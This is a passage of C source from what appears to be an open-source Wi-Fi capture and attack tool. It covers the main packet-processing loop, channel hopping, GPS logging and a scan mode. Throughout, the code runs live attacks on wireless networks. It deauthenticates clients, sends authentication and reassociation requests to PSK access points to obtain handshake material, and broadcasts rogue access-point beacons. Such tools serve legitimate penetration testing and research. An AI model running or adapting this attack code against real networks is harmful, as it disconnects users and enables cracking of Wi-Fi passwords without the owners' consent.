DISABLE_AP_ATTACKS) { if((zeiger->count %attackcount) == staytime) { if(((zeiger->akm &TAK_PSK) == TAK_PSK) || ((zeiger->akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if(((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) || ((zeiger->kdversion &KV_WPAIE) == KV_WPAIE)) send_authentication_req_opensystem(macfrx->addr2); } } if(((zeiger->count %attackcount) == staytime *2) && (memcmp(&mac_null, zeiger->client, 6) != 0)) { if((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) send_reassociation_req_wpa2(zeiger); else if((zeiger->kdversion &KV_WPAIE) == KV_WPAIE) send_reassociation_req_wpa1(zeiger); } } if((attackstatus &DISABLE_DEAUTHENTICATION) != DISABLE_DEAUTHENTICATION) { if(((zeiger->count %attackcount) == staytime *3) && (memcmp(&mac_null, zeiger->client, 6) != 0)) { send_deauthentication2client(zeiger->client, zeiger->ap, reasoncode); } if((zeiger->count %attackcount) == staytime *4) { send_deauthentication2client(macfrx->addr1, macfrx->addr2, reasoncode); } } } if(zeiger->count >= attackresumecount) zeiger->count = 0; if((zeiger->status &AP_BEACON) != AP_BEACON) { zeiger->status |= AP_BEACON; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if((statusout &STATUS_AP_BEACON_PROBE) == STATUS_AP_BEACON_PROBE) printstatusap(macfrx->addr1, zeiger, "BEACON"); } return; } memset(zeiger, 0, MACESSIDLIST_SIZE); gettags(apinfolen, apinfoptr, &tags); zeiger->timestamp = timestamp; zeiger->status = AP_BEACON; memcpy(zeiger->ap, macfrx->addr2, 6); if(tags.channel != 0) zeiger->channel = tags.channel; else zeiger->channel = ptrfscanlist->channel; zeiger->kdversion = tags.kdversion; zeiger->groupcipher = tags.groupcipher; zeiger->cipher = tags.cipher; zeiger->akm = tags.akm; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if(filtermode != 0) { if(setapfilter(zeiger) == true) { qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if(ptrfscanlist->channel == zeiger->channel) { if((tags.essidlen != 0) && (tags.essid[0] != 0)) { if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) { if(((zeiger->akm &TAK_PSK) == TAK_PSK) || ((zeiger->akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if(((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) || ((zeiger->kdversion &KV_WPAIE) == KV_WPAIE)) send_authentication_req_opensystem(macfrx->addr2); } if((attackstatus &DISABLE_DEAUTHENTICATION) != DISABLE_DEAUTHENTICATION) send_deauthentication2client(macfrx->addr1, macfrx->addr2, reasoncode); } } else { if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); } } if((statusout &STATUS_AP_BEACON_PROBE) == STATUS_AP_BEACON_PROBE) printstatusap(macfrx->addr1, zeiger, "BEACON"); qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ /*===========================================================================*/ static inline void get_channel() { static struct iwreq pwrq; static char timestring[16]; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.flags = IW_FREQ_FIXED; if(ioctl(fd_socket, SIOCGIWFREQ, &pwrq) < 0) return; if(aktchannel != pwrq.u.freq.m) { errorcount++; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); snprintf(servermsg, SERVERMSG_MAX, "%s ERROR: %d [INTERFACE IS NOT ON EXPECTED CHANNEL, EXPECTED: %d, DETECTED: %d]\n", timestring, errorcount, aktchannel, pwrq.u.freq.m); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); } return; } /*===========================================================================*/ static inline bool set_channel() { static struct iwreq pwrq; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = ptrfscanlist->frequency; pwrq.u.freq.e = 6; if(ioctl(fd_socket, SIOCSIWFREQ, &pwrq) < 0) return false; if(ioctl(fd_socket, SIOCGIWFREQ, &pwrq) == 0) aktchannel = pwrq.u.freq.m; return true; } /*===========================================================================*/ static inline bool set_channel_test(int freq) { static struct iwreq pwrq; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = freq; pwrq.u.freq.e = 6; if(ioctl(fd_socket, SIOCSIWFREQ, &pwrq) < 0) { fprintf(stderr, "driver doesn't support ioctl() SIOCSIWFREQ\n"); return false; } if(ioctl(fd_socket, SIOCGIWFREQ, &pwrq) < 0) { fprintf(stderr, "driver doesn't support ioctl() SIOCGIWFREQ\n"); return false; } if((pwrq.u.freq.m == freq) && (pwrq.u.freq.e == 6)) return true; fprintf(stderr, "driver use unsupported frequency format\n" "expected frequency: %d - reported frequency: %d\n" "expected exponent; 6 - reported exponent: %d\n", freq, pwrq.u.freq.m, pwrq.u.freq.e); return true; } /*===========================================================================*/ static inline void process_gps() { static char *nmeaptr; static const char *gpgga = "$GPGGA"; static const char *gprmc = "$GPRMC"; nmeatemplen = read(fd_gps, nmeatempsentence, NMEA_MAX -1); if(nmeatemplen < 0) { perror("\nfailed to read NMEA sentence"); gpserrorcount++; errorcount++; return; } nmeatempsentence[nmeatemplen] = 0; if(nmeatemplen < 48) return; nmeaptr = strstr(nmeatempsentence, gpgga); if(nmeaptr == NULL) nmeaptr = strstr(nmeatempsentence, gprmc); if(nmeaptr == NULL) return; nmealen = 0; while((nmeaptr[nmealen] != 0x0) && (nmeaptr[nmealen] != 0x0a) && (nmeaptr[nmealen] != 0xd)) nmealen++; nmeaptr[nmealen] = 0; memcpy(&nmeasentence, nmeaptr, nmealen +1); if(fd_pcapng > 0) writecbnmea(fd_pcapng); if(fh_nmea != NULL) fprintf(fh_nmea, "%s\n", nmeasentence); gpscount++; return; } /*===========================================================================*/ /*===========================================================================*/ static void sendpcapngheader() { static const uint8_t servermsgtype = SERVERMSG_TYPE_PCAPNGHEAD; sendto(fd_socket_mcsrv, &servermsgtype, sizeof(servermsgtype), MSG_MORE, (struct sockaddr*)&mcsrvaddress, sizeof(mcsrvaddress)); hcxcreatepcapngdumpfdsocket(fd_socket_mcsrv, (struct sockaddr*)&mcsrvaddress, mac_orig, interfacename, mac_myap, myrc, myanonce, mac_myclient, mysnonce, weakcandidatelen, weakcandidate); return; } /*===========================================================================*/ static void process_packet_client() { static ssize_t serverrecvlen; static uint8_t serverrecvbuf[SERVERMSG_MAX]; static struct sockaddr_in sockaddrFrom; static socklen_t sockaddrFrom_len = sizeof(sockaddrFrom); serverrecvlen = recvfrom(fd_socket_srv, &serverrecvbuf, SERVERMSG_MAX, 0, (struct sockaddr*)&sockaddrFrom, &sockaddrFrom_len); if((serverrecvlen >= 2) && (sockaddrFrom.sin_port == mcsrvaddress.sin_port)) { if(serverrecvbuf[0] == SERVERMSG_TYPE_CONTROL) { switch(serverrecvbuf[1]) { case SERVERMSG_CONTROL_SENDPCAPNGHEAD: if((pcapngoutname != NULL) && (fd_pcapng == fd_socket_mcsrv)) sendpcapngheader(); break; } } } } /*===========================================================================*/ static uint32_t getradiotapfield(uint16_t rthlen, uint32_t rthp) { static int i; static uint16_t pf; static uint16_t pfc; static uint32_t *pp; pf = RTH_SIZE; rssi = 0; if((rthp & IEEE80211_RADIOTAP_EXT) == IEEE80211_RADIOTAP_EXT) { pp = (uint32_t*)packetptr; for(i = 2; i < rthlen /4; i++) { pf += 4; if((le32toh(pp[i]) & IEEE80211_RADIOTAP_EXT) != IEEE80211_RADIOTAP_EXT) break; } } if((rthp & IEEE80211_RADIOTAP_TSFT) == IEEE80211_RADIOTAP_TSFT) pf += 8; pfc = 0; if((rthp & IEEE80211_RADIOTAP_FLAGS) == IEEE80211_RADIOTAP_FLAGS) { if((packetptr[pf] & IEEE80211_RADIOTAP_F_FCS) == IEEE80211_RADIOTAP_F_FCS) pfc = 4; pf +=1; } if((rthp & IEEE80211_RADIOTAP_RATE) == IEEE80211_RADIOTAP_RATE) pf += 1; if((rthp & IEEE80211_RADIOTAP_CHANNEL) == IEEE80211_RADIOTAP_CHANNEL) { if((pf %2) != 0) pf += 1; pf += 4; } if((rthp & IEEE80211_RADIOTAP_FHSS) == IEEE80211_RADIOTAP_FHSS) { if((pf %2) != 0) pf += 1; pf += 2; } if((rthp & IEEE80211_RADIOTAP_DBM_ANTSIGNAL) == IEEE80211_RADIOTAP_DBM_ANTSIGNAL) { if(pf > rthlen) return pfc; rssi = packetptr[pf]; } return pfc; } /*===========================================================================*/ static inline void process_packet() { static int rthl; static uint32_t rthp; static authf_t *auth; packetlen = recvfrom(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN, 0, NULL, NULL); timestamp = ((uint64_t)tv.tv_sec *1000000) + tv.tv_usec; if(packetlen == 0) { fprintf(stderr, "\ninterface went down\n"); globalclose(); } if(packetlen < 0) { perror("\nfailed to read packet"); errorcount++; return; } #ifdef DEBUG debugprint(packetlen, &epb[EPB_SIZE], NULL); #endif if(packetlen < (int)RTH_SIZE) { fprintf(stderr, "\ngot damged radiotap header\n"); errorcount++; return; } packetptr = &epb[EPB_SIZE]; rth = (rth_t*)packetptr; if(rth->it_version != 0) { radiotaperrorcount++; errorcount++; return; } if(rth->it_pad != 0) { radiotaperrorcount++; errorcount++; return; } if(rth->it_present == 0) { radiotaperrorcount++; errorcount++; return; } rthp = le32toh(rth->it_present); if((rthp & IEEE80211_RADIOTAP_TX_FLAGS) == IEEE80211_RADIOTAP_TX_FLAGS) return; rthl = le16toh(rth->it_len); if(rthl > packetlen) { radiotaperrorcount++; errorcount++; return; } ieee82011ptr = packetptr +rthl; ieee82011len = packetlen -rthl; ieee82011len -= getradiotapfield(rthl, rthp); if(ieee82011len < MAC_SIZE_ACK) return; incomingcount++; tvlast_sec = tv.tv_sec; macfrx = (mac_t*)ieee82011ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payloadptr = ieee82011ptr +MAC_SIZE_LONG; payloadlen = ieee82011len -MAC_SIZE_LONG; } else { payloadptr = ieee82011ptr +MAC_SIZE_NORM; payloadlen = ieee82011len -MAC_SIZE_NORM; } if(macfrx->type == IEEE80211_FTYPE_MGMT) { if(macfrx->subtype == IEEE80211_STYPE_BEACON) { process80211beacon(); if(beaconfloodflag == true) send_beacon_active(); } else if(macfrx->subtype == IEEE80211_STYPE_PROBE_REQ) { if(memcmp(&mac_broadcast, macfrx->addr1, 6) == 0) process80211probe_req(); else if(memcmp(&mac_myaphidden, macfrx->addr1, 6) == 0) return; else if(memcmp(&mac_null, macfrx->addr1, 6) == 0) process80211probe_req(); else process80211probe_req_directed(); } else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) process80211probe_resp(); else if(macfrx->subtype == IEEE80211_STYPE_AUTH) { auth = (authf_t*)payloadptr; if(auth->algorithm == SAE) process80211authentication_sae(); else if(memcmp(macfrx->addr1, macfrx->addr3, 6) == 0) process80211authentication_req(); else if(memcmp(macfrx->addr2, macfrx->addr3, 6) == 0) process80211authentication_resp(); } else if(macfrx->subtype == IEEE80211_STYPE_ASSOC_REQ) process80211association_req(); else if(macfrx->subtype == IEEE80211_STYPE_ASSOC_RESP) process80211association_resp(); else if(macfrx->subtype == IEEE80211_STYPE_REASSOC_REQ) process80211reassociation_req(); else if(macfrx->subtype == IEEE80211_STYPE_REASSOC_RESP) process80211reassociation_resp(); else if(macfrx->subtype == IEEE80211_STYPE_ACTION) process80211action(); else if(macfrx->subtype == IEEE80211_STYPE_DEAUTH) process80211deauth(); } else if(macfrx->type == IEEE80211_FTYPE_CTL) { if(macfrx->subtype == IEEE80211_STYPE_ACK) process80211ack(); else if(macfrx->subtype == IEEE80211_STYPE_RTS) process80211rts(); else if(macfrx->subtype == IEEE80211_STYPE_PSPOLL) process80211powersave_poll(); else if(macfrx->subtype == IEEE80211_STYPE_BACK) process80211blockack(); else if(macfrx->subtype == IEEE80211_STYPE_BACK_REQ) process80211blockack_req(); } else if(macfrx->type == IEEE80211_FTYPE_DATA) { if((macfrx->subtype &IEEE80211_STYPE_NULLFUNC) == IEEE80211_STYPE_NULLFUNC) { if(((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) || ((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS)) process80211null(); } else if((macfrx->subtype &IEEE80211_STYPE_QOS_NULLFUNC) == IEEE80211_STYPE_QOS_NULLFUNC) { if(((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) || ((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS)) process80211qosnull(); return; } qosflag = false; if((macfrx->subtype &IEEE80211_STYPE_QOS_DATA) == IEEE80211_STYPE_QOS_DATA) { qosflag = true; payloadptr += QOS_SIZE; payloadlen -= QOS_SIZE; } if(payloadlen < LLC_SIZE) return; llcptr = payloadptr; llc = (llc_t*)llcptr; if(((ntohs(llc->type)) == LLC_TYPE_AUTH) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) process80211eap(); else if(((ntohs(llc->type)) == LLC_TYPE_IPV4) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { if((pcapngframesout &PCAPNG_FRAME_IPV4) == PCAPNG_FRAME_IPV4) { if(fd_pcapng <= 0) return; if((pcapngframesout &PCAPNG_FRAME_IPV4) != PCAPNG_FRAME_IPV4) return; writeepb(fd_pcapng); } } else if(((ntohs(llc->type)) == LLC_TYPE_IPV6) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { if((pcapngframesout &PCAPNG_FRAME_IPV6) == PCAPNG_FRAME_IPV6) { if(fd_pcapng <= 0) return; if((pcapngframesout &PCAPNG_FRAME_IPV6) != PCAPNG_FRAME_IPV6) return; writeepb(fd_pcapng); } } else if(macfrx->prot ==1) { mpduptr = payloadptr; mpdu = (mpdu_t*)mpduptr; if(((mpdu->keyid >> 5) &1) == 1) process80211data_wpa(); else if(((mpdu->keyid >> 5) &1) == 0) process80211data_wep(); } } return; } /*===========================================================================*/ static inline void process_fd() { static int sd; static int fdnum; static fd_set readfds; static struct timespec tsfd; static const char *fimtempl; static const char *fimtemplprotect = "protect"; static const char *fimtemplattack = "attack"; static const char *fimtemplunused = "unused"; fimtempl = fimtemplunused; if(filtermode == 1) fimtempl = fimtemplprotect; if(filtermode == 2) fimtempl = fimtemplattack; snprintf(servermsg, SERVERMSG_MAX, "\e[?25l\nstart capturing (stop with ctrl+c)\n" "NMEA 0183 SENTENCE........: %s\n" "INTERFACE NAME............: %s\n" "INTERFACE PROTOCOL........: %s\n" "INTERFACE TX POWER........: %d dBm (lowest value reported by the device)\n" "INTERFACE HARDWARE MAC....: %02x%02x%02x%02x%02x%02x (not used for the attack)\n" "INTERFACE VIRTUAL MAC.....: %02x%02x%02x%02x%02x%02x (not used for the attack)\n" "DRIVER....................: %s\n" "DRIVER VERSION............: %s\n" "DRIVER FIRMWARE VERSION...: %s\n" "openSSL version...........: %d.%d\n" "ERRORMAX..................: %d errors\n" "BPF code blocks...........: %" PRIu16 "\n" "FILTERLIST ACCESS POINT...: %d entries\n" "FILTERLIST CLIENT.........: %d entries\n" "FILTERMODE................: %s\n" "WEAK CANDIDATE............: %s\n" "ESSID list................: %d entries\n" "ACCESS POINT (ROGUE)......: %02x%02x%02x%02x%02x%02x (BROADCAST HIDDEN used for the attack)\n" "ACCESS POINT (ROGUE)......: %02x%02x%02x%02x%02x%02x (BROADCAST OPEN used for the attack)\n" "ACCESS POINT (ROGUE)......: %02x%02x%02x%02x%02x%02x (used for the attack and incremented on every new client)\n" "CLIENT (ROGUE)............: %02x%02x%02x%02x%02x%02x\n" "EAPOLTIMEOUT..............: %" PRIu64 " usec\n" "EAPOLEAPTIMEOUT...........: %" PRIu64 " usec\n" "REPLAYCOUNT...............: %" PRIu64 "\n" "ANONCE....................: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n" "SNONCE....................: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n" "\n", nmeasentence, interfacename, interfaceprotocol, interfacetxpwr, mac_orig[0], mac_orig[1], mac_orig[2], mac_orig[3], mac_orig[4], mac_orig[5], mac_virt[0], mac_virt[1], mac_virt[2], mac_virt[3], mac_virt[4], mac_virt[5], drivername, driverversion, driverfwversion, opensslversionmajor, opensslversionminor, maxerrorcount, bpf.len, filteraplistentries, filterclientlistentries, fimtempl, weakcandidate, beaconextlistlen, mac_myaphidden[0], mac_myaphidden[1], mac_myaphidden[2], mac_myaphidden[3], mac_myaphidden[4], mac_myaphidden[5], mac_myapopen[0], mac_myapopen[1], mac_myapopen[2], mac_myapopen[3], mac_myapopen[4], mac_myapopen[5], mac_myap[0], mac_myap[1], mac_myap[2], mac_myap[3], mac_myap[4], mac_myap[5], mac_myclient[0], mac_myclient[1], mac_myclient[2], mac_myclient[3], mac_myclient[4], mac_myclient[5], eapoltimeoutvalue, eapoleaptimeoutvalue, myrc, myanonce[0], myanonce[1], myanonce[2], myanonce[3], myanonce[4], myanonce[5], myanonce[6], myanonce[7], myanonce[8], myanonce[9], myanonce[10], myanonce[11], myanonce[12], myanonce[13], myanonce[14], myanonce[15], myanonce[16], myanonce[17], myanonce[18], myanonce[19], myanonce[20], myanonce[21], myanonce[22], myanonce[23], myanonce[24], myanonce[25], myanonce[26], myanonce[27], myanonce[28], myanonce[29], myanonce[30], myanonce[31], mysnonce[0], mysnonce[1], mysnonce[2], mysnonce[3], mysnonce[4], mysnonce[5], mysnonce[6], mysnonce[7], mysnonce[8], mysnonce[9], mysnonce[10], mysnonce[11], mysnonce[12], mysnonce[13], mysnonce[14], mysnonce[15], mysnonce[16], mysnonce[17], mysnonce[18], mysnonce[19], mysnonce[20], mysnonce[21], mysnonce[22], mysnonce[23], mysnonce[24], mysnonce[25], mysnonce[26], mysnonce[27], mysnonce[28], mysnonce[29], mysnonce[30], mysnonce[31]); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); gettimeofday(&tv, NULL); tsfd.tv_sec = 0; tsfd.tv_nsec = FDNSECTIMERB; ptrfscanlist = fscanlist; if(set_channel() == false) errorcount++; if(beaconactiveflag == true) { send_beacon_open(); send_beacon_hidden(); } if(rgbeaconlist->timestamp != 0) send_beacon_list_active(); while(wantstopflag == false) { if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); if(forceinterfaceflag == false) globalclose(); } if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) globalclose(); } gettimeofday(&tv, NULL); if(tv.tv_sec != tvold.tv_sec) { get_channel(); tvold.tv_sec = tv.tv_sec; if(tv.tv_sec >= tvtot.tv_sec) { totflag = true; globalclose(); } if((tv.tv_sec %gpiostatusledflashinterval) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; if((tv.tv_sec -tvlast_sec) > WATCHDOG) { nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; printreceivewatchdogwarnung(); } } } if((tv.tv_sec %staytime) == 0) { ptrfscanlist++; if(ptrfscanlist->frequency == 0) ptrfscanlist = fscanlist; if(set_channel() == false) { errorcount++; continue; } packetsentflag = false; if(beaconactiveflag == true) { send_beacon_active(); send_beacon_open(); send_beacon_hidden(); } if(rgbeaconlist->timestamp != 0) send_beacon_list_active(); } if((tv.tv_sec %60) == 0) { if(((statusout &STATUS_GPS) == STATUS_GPS) && (fd_gps > 0)) printposition(); if((statusout &STATUS_INTERNAL) == STATUS_INTERNAL) printtimestatus(); } } if(reloadfilesflag == true) loadfiles(); if((packetsentflag == true) && ((tv.tv_usec -tvpacketsent.tv_usec) > PACKET_RESEND_TIMER_USEC)) resend_packet(); FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); sd = fd_socket; if(fd_gps > 0) { FD_SET(fd_gps, &readfds); sd = fd_gps; } if(fd_socket_srv > 0) { FD_SET(fd_socket_srv, &readfds); sd = fd_socket_srv; } fdnum = pselect(sd +1, &readfds, NULL, NULL, &tsfd, NULL); if(fdnum < 0) { errorcount++; continue; } if(FD_ISSET(fd_gps, &readfds)) process_gps(); else if(FD_ISSET(fd_socket, &readfds)) process_packet(); else if(FD_ISSET(fd_socket_srv, &readfds)) process_packet_client(); else { if(beaconactiveflag == true) send_beacon_active(); if(rgbeaconlist->timestamp != 0) send_beacon_list_active(); } } globalclose(); return; } /*===========================================================================*/ static inline void printrcascan() { static scanlist_t *zeiger; static char timestring[16]; if(rcaorder == RCA_SORT_BY_HIT) qsort(scanlist, scanlistmax, SCANLIST_SIZE, sort_scanlist_by_hit); else if(rcaorder == RCA_SORT_BY_COUNT) qsort(scanlist, scanlistmax, SCANLIST_SIZE, sort_scanlist_by_beacon); else if(rcaorder == RCA_SORT_BY_CHANNEL) qsort(scanlist, scanlistmax, SCANLIST_SIZE, sort_scanlist_by_channel); strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "\033[2J\033[0;0H BSSID FREQ CH RSSI BEACON RESPONSE ESSID SCAN-FREQ: %4d INJECTION-RATIO: %3d%% [%s]\n" "-----------------------------------------------------------------------------------------------------\n", ptrfscanlist->frequency, injectionratio, timestring); for(zeiger = scanlist; zeiger < scanlist +scanlistmax; zeiger++) { if(zeiger->count == 0) return; injectionhit += zeiger->hit; injectioncount += zeiger->beacon; if((injectionhit > 0) && (injectioncount > 0)) { injectionratio = (injectionhit *100) /injectioncount; if(injectionratio > 100) injectionratio = 100; } if(zeiger->channel != 0) fprintf(stdout, " %02x%02x%02x%02x%02x%02x %4d %3d %4d %6d %6d %s\n", zeiger->ap[0], zeiger->ap[1], zeiger->ap[2], zeiger->ap[3], zeiger->ap[4], zeiger->ap[5], zeiger->frequency, zeiger->channel, zeiger->rssi, zeiger->beacon, zeiger->hit, zeiger->essid); } return; } /*===========================================================================*/ static inline void process80211probe_resp_rca_scan() { static int apinfolen; static uint8_t *apinfoptr; static scanlist_t *zeiger; static tags_t tags; if(targetscanflag == true) { if(memcmp(&lastap, macfrx->addr2, 6) != 0) return; } if(payloadlen < CAPABILITIESAP_SIZE +IETAG_SIZE) return; apinfoptr = payloadptr +CAPABILITIESAP_SIZE; apinfolen = payloadlen -CAPABILITIESAP_SIZE; for(zeiger = scanlist; zeiger < scanlist +SCANLIST_MAX -1; zeiger++) { if(zeiger->count == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; gettags(apinfolen, apinfoptr, &tags); if(tags.channel == ptrfscanlist->channel) { zeiger->frequency = ptrfscanlist->frequency; zeiger->channel = tags.channel; } zeiger->timestamp = timestamp; zeiger->count +=1; zeiger->proberesponse +=1; zeiger->rssi = rssi; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, ESSID_LEN_MAX); if(memcmp(macfrx->addr1, &mac_myclient, 6) == 0) { zeiger->hit += 1; responsehit++; } return; } memset(zeiger, 0, SCANLIST_SIZE); gettags(apinfolen, apinfoptr, &tags); if(tags.channel == ptrfscanlist->channel) { zeiger->frequency = ptrfscanlist->frequency; zeiger->channel = tags.channel; } zeiger->timestamp = timestamp; zeiger->count = 1; zeiger->proberesponse =1; zeiger->rssi = rssi; memcpy(zeiger->ap, macfrx->addr2, 6); zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, ESSID_LEN_MAX); if(memcmp(macfrx->addr1, &mac_myclient, 6) == 0) { zeiger->hit += 1; responsehit++; } qsort(scanlist, zeiger -scanlist, SCANLIST_SIZE, sort_scanlist_by_hit); return; } /*===========================================================================*/ static inline void process80211beacon_rca_scan() { static int apinfolen; static uint8_t *apinfoptr; static scanlist_t *zeiger; static tags_t tags; if(targetscanflag == true) { if(memcmp(&lastap, macfrx->addr2, 6) != 0) return; } if(payloadlen < CAPABILITIESAP_SIZE +IETAG_SIZE) return; apinfoptr = payloadptr +CAPABILITIESAP_SIZE; apinfolen = payloadlen -CAPABILITIESAP_SIZE; for(zeiger = scanlist; zeiger < scanlist +SCANLIST_MAX -1; zeiger++) { if(zeiger->count == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; gettags(apinfolen, apinfoptr, &tags); if(tags.channel == ptrfscanlist->channel) { zeiger->frequency = ptrfscanlist->frequency; zeiger->channel = tags.channel; } zeiger->timestamp = timestamp; zeiger->count += 1; zeiger->beacon += 1; zeiger->rssi = rssi; if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) { if((zeiger->beacon %10) == 0) { zeiger->proberequest +=1; send_proberequest_directed(macfrx->addr2, zeiger->essidlen, zeiger->essid); } } return; } memset(zeiger, 0, SCANLIST_SIZE); gettags(apinfolen, apinfoptr, &tags); if(tags.channel == ptrfscanlist->channel) { zeiger->frequency = ptrfscanlist->frequency; zeiger->channel = tags.channel; } zeiger->timestamp = timestamp; zeiger->count = 1; zeiger->beacon = 1; zeiger->rssi = rssi; memcpy(zeiger->ap, macfrx->addr2, 6); zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, ESSID_LEN_MAX); if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) { zeiger->proberequest +=1; send_proberequest_directed(macfrx->addr2, zeiger->essidlen, zeiger->essid); } qsort(scanlist, zeiger -scanlist, SCANLIST_SIZE, sort_scanlist_by_hit); return; } /*===========================================================================*/ static inline void process_packet_rca() { static int rthl; static uint32_t rthp; packetlen = read(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN); if(packetlen == 0) { fprintf(stderr, "\ninterface went down\n"); globalclose(); } if(packetlen < 0) { perror("\nfailed to read packet"); errorcount++; return; } #ifdef DEBUG debugprint(packetlen, &epb[EPB_SIZE], NULL); #endif if(packetlen < (int)RTH_SIZE) { fprintf(stderr, "\ngot damged radiotap header\n"); errorcount++; return; } if(ioctl(fd_socket, SIOCGSTAMP, &tv) < 0) { perror("\nfailed to get time stamp"); errorcount++; return; } timestamp = ((uint64_t)tv.tv_sec *1000000) + tv.tv_usec; packetptr = &epb[EPB_SIZE]; rth = (rth_t*)packetptr; if(rth->it_version != 0) { radiotaperrorcount++; errorcount++; return; } if(rth->it_pad != 0) { radiotaperrorcount++; errorcount++; return; } if(rth->it_present == 0) { radiotaperrorcount++; errorcount++; return; } rthp = le32toh(rth->it_present); if((rthp & IEEE80211_RADIOTAP_TX_FLAGS) == IEEE80211_RADIOTAP_TX_FLAGS) return; rthl = le16toh(rth->it_len); if(rthl > packetlen) { radiotaperrorcount++; errorcount++; return; } ieee82011ptr = packetptr +rthl; ieee82011len = packetlen -rthl; ieee82011len -= getradiotapfield(rthl, rthp); if(ieee82011len < MAC_SIZE_ACK) return; incomingcount++; tvlast_sec = tv.tv_sec; macfrx = (mac_t*)ieee82011ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payloadptr = ieee82011ptr +MAC_SIZE_LONG; payloadlen = ieee82011len -MAC_SIZE_LONG; } else { payloadptr = ieee82011ptr +MAC_SIZE_NORM; payloadlen = ieee82011len -MAC_SIZE_NORM; } if(macfrx->type == IEEE80211_FTYPE_MGMT) { if(macfrx->subtype == IEEE80211_STYPE_BEACON) process80211beacon_rca_scan(); else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) process80211probe_resp_rca_scan(); } if(fd_pcapng > 0) writeepb(fd_pcapng); return; } /*===========================================================================*/ static inline void process_fd_rca() { static uint64_t incomingcountold; static int sd; static int fdnum; static fd_set readfds; static struct timespec tsfd; gettimeofday(&tv, NULL); tvold.tv_sec = tv.tv_sec; tvold.tv_usec = tv.tv_usec; tsfd.tv_sec = 0; tsfd.tv_nsec = FDNSECTIMER; if(set_channel() == false) errorcount++; if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); printrcascan(); while(wantstopflag == false) { if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); if(forceinterfaceflag == false) globalclose(); } if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) globalclose(); } gettimeofday(&tv, NULL); if(tv.tv_sec != tvold.tv_sec) { get_channel(); ptrfscanlist++; if(ptrfscanlist->frequency == 0) ptrfscanlist = fscanlist; if(set_channel() == false) { errorcount++; continue; } tvold.tv_sec = tv.tv_sec; if(tv.tv_sec >= tvtot.tv_sec) { totflag = true; 